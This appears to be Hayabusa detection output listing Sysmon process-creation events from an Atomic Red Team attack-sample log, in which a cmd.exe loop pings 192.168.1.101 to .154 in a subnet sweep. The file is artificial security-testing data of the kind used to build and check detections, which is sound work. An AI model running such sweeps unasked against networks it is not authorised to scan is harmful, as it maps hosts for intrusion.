2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.101  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.102  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.103  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.104  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.105  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.106  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.107  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.108  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.109  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.110  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.111  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.112  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.113  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.114  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.115  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.116  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.117  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.118  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.119  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.120  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.121  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.122  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.123  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.124  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.125  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.126  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.127  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.128  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.129  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.130  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.131  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.132  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.133  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.134  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.135  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.136  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.137  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.138  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.139  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.140  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.141  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.142  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.143  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.144  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.145  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.146  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.147  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.148  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.149  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.150  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.151  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.152  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.153  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.154  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
